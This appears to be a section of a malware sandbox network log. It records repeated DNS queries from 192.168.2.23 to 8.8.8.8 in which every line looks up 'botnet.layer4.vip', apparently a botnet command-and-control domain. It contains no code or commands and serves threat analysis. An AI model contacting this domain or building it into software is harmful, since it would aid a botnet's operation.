                                  Apr 9, 2023 03:32:18.872971058 CEST192.168.2.238.8.8.80xb7f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.897591114 CEST192.168.2.238.8.8.80xb7f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.913554907 CEST192.168.2.238.8.8.80xb7f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.930478096 CEST192.168.2.238.8.8.80xb7f0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.946439028 CEST192.168.2.238.8.8.80x4ba3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.963318110 CEST192.168.2.238.8.8.80x4ba3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.979604006 CEST192.168.2.238.8.8.80x4ba3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:18.995434046 CEST192.168.2.238.8.8.80x4ba3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.019954920 CEST192.168.2.238.8.8.80x4ba3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.035521984 CEST192.168.2.238.8.8.80x71bdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.051047087 CEST192.168.2.238.8.8.80x71bdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.075158119 CEST192.168.2.238.8.8.80x71bdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.090733051 CEST192.168.2.238.8.8.80x71bdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.106637955 CEST192.168.2.238.8.8.80x71bdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.130830050 CEST192.168.2.238.8.8.80x36f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.155988932 CEST192.168.2.238.8.8.80x36f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.180558920 CEST192.168.2.238.8.8.80x36f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.196351051 CEST192.168.2.238.8.8.80x36f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.224200964 CEST192.168.2.238.8.8.80x36f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.240231037 CEST192.168.2.238.8.8.80x3be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.264381886 CEST192.168.2.238.8.8.80x3be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.280363083 CEST192.168.2.238.8.8.80x3be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.296184063 CEST192.168.2.238.8.8.80x3be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.320271015 CEST192.168.2.238.8.8.80x3be3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.336231947 CEST192.168.2.238.8.8.80x1e20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.351802111 CEST192.168.2.238.8.8.80x1e20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.367312908 CEST192.168.2.238.8.8.80x1e20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.391562939 CEST192.168.2.238.8.8.80x1e20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.415935040 CEST192.168.2.238.8.8.80x1e20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.440100908 CEST192.168.2.238.8.8.80x9781Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.455972910 CEST192.168.2.238.8.8.80x9781Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.471827984 CEST192.168.2.238.8.8.80x9781Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.487692118 CEST192.168.2.238.8.8.80x9781Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.512082100 CEST192.168.2.238.8.8.80x9781Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.528027058 CEST192.168.2.238.8.8.80x5c29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.543529987 CEST192.168.2.238.8.8.80x5c29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.559075117 CEST192.168.2.238.8.8.80x5c29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.574930906 CEST192.168.2.238.8.8.80x5c29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.591259956 CEST192.168.2.238.8.8.80x5c29Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.615828037 CEST192.168.2.238.8.8.80xabd0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.632229090 CEST192.168.2.238.8.8.80xabd0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.647842884 CEST192.168.2.238.8.8.80xabd0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.671948910 CEST192.168.2.238.8.8.80xabd0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.687621117 CEST192.168.2.238.8.8.80xabd0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.704911947 CEST192.168.2.238.8.8.80xc4fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.729326010 CEST192.168.2.238.8.8.80xc4fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.753448009 CEST192.168.2.238.8.8.80xc4fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.771111965 CEST192.168.2.238.8.8.80xc4fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.786854982 CEST192.168.2.238.8.8.80xc4fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.803057909 CEST192.168.2.238.8.8.80xee9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.827788115 CEST192.168.2.238.8.8.80xee9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.844086885 CEST192.168.2.238.8.8.80xee9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.868566990 CEST192.168.2.238.8.8.80xee9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.893481970 CEST192.168.2.238.8.8.80xee9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.910037994 CEST192.168.2.238.8.8.80x569bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.935571909 CEST192.168.2.238.8.8.80x569bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.961709023 CEST192.168.2.238.8.8.80x569bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:19.977632046 CEST192.168.2.238.8.8.80x569bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.002031088 CEST192.168.2.238.8.8.80x569bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.026257038 CEST192.168.2.238.8.8.80xf1aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.050383091 CEST192.168.2.238.8.8.80xf1aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.074727058 CEST192.168.2.238.8.8.80xf1aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.099092007 CEST192.168.2.238.8.8.80xf1aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.114895105 CEST192.168.2.238.8.8.80xf1aeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.139059067 CEST192.168.2.238.8.8.80x8a80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.154906988 CEST192.168.2.238.8.8.80x8a80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.170514107 CEST192.168.2.238.8.8.80x8a80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.195132971 CEST192.168.2.238.8.8.80x8a80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.210587978 CEST192.168.2.238.8.8.80x8a80Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.234750986 CEST192.168.2.238.8.8.80x4691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.250304937 CEST192.168.2.238.8.8.80x4691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.265923023 CEST192.168.2.238.8.8.80x4691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.290605068 CEST192.168.2.238.8.8.80x4691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.306153059 CEST192.168.2.238.8.8.80x4691Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.321764946 CEST192.168.2.238.8.8.80x5f76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.337584972 CEST192.168.2.238.8.8.80x5f76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.353327990 CEST192.168.2.238.8.8.80x5f76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.369548082 CEST192.168.2.238.8.8.80x5f76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.394686937 CEST192.168.2.238.8.8.80x5f76Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.410607100 CEST192.168.2.238.8.8.80xec10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.436115980 CEST192.168.2.238.8.8.80xec10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.454612970 CEST192.168.2.238.8.8.80xec10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.480658054 CEST192.168.2.238.8.8.80xec10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.505835056 CEST192.168.2.238.8.8.80xec10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.523767948 CEST192.168.2.238.8.8.80x9069Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.547849894 CEST192.168.2.238.8.8.80x9069Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.572252035 CEST192.168.2.238.8.8.80x9069Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.587843895 CEST192.168.2.238.8.8.80x9069Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.603323936 CEST192.168.2.238.8.8.80x9069Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.619429111 CEST192.168.2.238.8.8.80x74d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.635231972 CEST192.168.2.238.8.8.80x74d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.659316063 CEST192.168.2.238.8.8.80x74d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.683640003 CEST192.168.2.238.8.8.80x74d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.708034039 CEST192.168.2.238.8.8.80x74d3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.732088089 CEST192.168.2.238.8.8.80x89cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.747543097 CEST192.168.2.238.8.8.80x89cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.771598101 CEST192.168.2.238.8.8.80x89cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.795969963 CEST192.168.2.238.8.8.80x89cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.812167883 CEST192.168.2.238.8.8.80x89cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.837589979 CEST192.168.2.238.8.8.80x930aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.861644983 CEST192.168.2.238.8.8.80x930aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.886924982 CEST192.168.2.238.8.8.80x930aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.912936926 CEST192.168.2.238.8.8.80x930aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.937078953 CEST192.168.2.238.8.8.80x930aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.961565018 CEST192.168.2.238.8.8.80x3dbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:20.976990938 CEST192.168.2.238.8.8.80x3dbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.001019955 CEST192.168.2.238.8.8.80x3dbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.025021076 CEST192.168.2.238.8.8.80x3dbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.040826082 CEST192.168.2.238.8.8.80x3dbfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.056701899 CEST192.168.2.238.8.8.80x785bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.072117090 CEST192.168.2.238.8.8.80x785bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.087564945 CEST192.168.2.238.8.8.80x785bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.104271889 CEST192.168.2.238.8.8.80x785bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.128281116 CEST192.168.2.238.8.8.80x785bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.144418001 CEST192.168.2.238.8.8.80x8c4eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.159847975 CEST192.168.2.238.8.8.80x8c4eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.177124977 CEST192.168.2.238.8.8.80x8c4eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.195022106 CEST192.168.2.238.8.8.80x8c4eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.211626053 CEST192.168.2.238.8.8.80x8c4eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.230632067 CEST192.168.2.238.8.8.80x9c8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.246196985 CEST192.168.2.238.8.8.80x9c8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.270272970 CEST192.168.2.238.8.8.80x9c8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.294554949 CEST192.168.2.238.8.8.80x9c8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.318675995 CEST192.168.2.238.8.8.80x9c8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.334712982 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.350589991 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.374536037 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.390264988 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.414653063 CEST192.168.2.238.8.8.80x19e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.430373907 CEST192.168.2.238.8.8.80xa9c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.446629047 CEST192.168.2.238.8.8.80xa9c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.462388992 CEST192.168.2.238.8.8.80xa9c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.486402035 CEST192.168.2.238.8.8.80xa9c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.510787964 CEST192.168.2.238.8.8.80xa9c0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.534975052 CEST192.168.2.238.8.8.80x75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.550642967 CEST192.168.2.238.8.8.80x75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.574871063 CEST192.168.2.238.8.8.80x75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.599021912 CEST192.168.2.238.8.8.80x75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.623143911 CEST192.168.2.238.8.8.80x75Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.647756100 CEST192.168.2.238.8.8.80x549fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.672084093 CEST192.168.2.238.8.8.80x549fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.687933922 CEST192.168.2.238.8.8.80x549fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.703430891 CEST192.168.2.238.8.8.80x549fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.719325066 CEST192.168.2.238.8.8.80x549fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.735291958 CEST192.168.2.238.8.8.80x3085Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.750942945 CEST192.168.2.238.8.8.80x3085Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.767328024 CEST192.168.2.238.8.8.80x3085Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.783041000 CEST192.168.2.238.8.8.80x3085Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.807682037 CEST192.168.2.238.8.8.80x3085Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.831693888 CEST192.168.2.238.8.8.80x63e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.847238064 CEST192.168.2.238.8.8.80x63e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.871725082 CEST192.168.2.238.8.8.80x63e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.887542963 CEST192.168.2.238.8.8.80x63e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.911956072 CEST192.168.2.238.8.8.80x63e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.936430931 CEST192.168.2.238.8.8.80x6999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.952204943 CEST192.168.2.238.8.8.80x6999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.967998981 CEST192.168.2.238.8.8.80x6999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:21.984054089 CEST192.168.2.238.8.8.80x6999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.008044958 CEST192.168.2.238.8.8.80x6999Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.032533884 CEST192.168.2.238.8.8.80x7f8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.048367977 CEST192.168.2.238.8.8.80x7f8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.072516918 CEST192.168.2.238.8.8.80x7f8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.097439051 CEST192.168.2.238.8.8.80x7f8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.113219976 CEST192.168.2.238.8.8.80x7f8eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.137677908 CEST192.168.2.238.8.8.80x2983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.153719902 CEST192.168.2.238.8.8.80x2983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.177900076 CEST192.168.2.238.8.8.80x2983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.193878889 CEST192.168.2.238.8.8.80x2983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.209795952 CEST192.168.2.238.8.8.80x2983Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.225383997 CEST192.168.2.238.8.8.80xe54bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.241163015 CEST192.168.2.238.8.8.80xe54bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.256923914 CEST192.168.2.238.8.8.80xe54bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.272753954 CEST192.168.2.238.8.8.80xe54bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.297141075 CEST192.168.2.238.8.8.80xe54bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.321239948 CEST192.168.2.238.8.8.80x9ceeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.337188005 CEST192.168.2.238.8.8.80x9ceeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.357995987 CEST192.168.2.238.8.8.80x9ceeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.384815931 CEST192.168.2.238.8.8.80x9ceeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.408911943 CEST192.168.2.238.8.8.80x9ceeStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.424851894 CEST192.168.2.238.8.8.80x51e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.448915958 CEST192.168.2.238.8.8.80x51e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.473125935 CEST192.168.2.238.8.8.80x51e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.488840103 CEST192.168.2.238.8.8.80x51e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.504867077 CEST192.168.2.238.8.8.80x51e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.529742002 CEST192.168.2.238.8.8.80x6777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.553787947 CEST192.168.2.238.8.8.80x6777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.569241047 CEST192.168.2.238.8.8.80x6777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.593550920 CEST192.168.2.238.8.8.80x6777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.617515087 CEST192.168.2.238.8.8.80x6777Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.641839027 CEST192.168.2.238.8.8.80x4c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.665920973 CEST192.168.2.238.8.8.80x4c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.690440893 CEST192.168.2.238.8.8.80x4c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.706296921 CEST192.168.2.238.8.8.80x4c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.723001003 CEST192.168.2.238.8.8.80x4c2bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.739110947 CEST192.168.2.238.8.8.80x5feaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.764049053 CEST192.168.2.238.8.8.80x5feaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.788604021 CEST192.168.2.238.8.8.80x5feaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
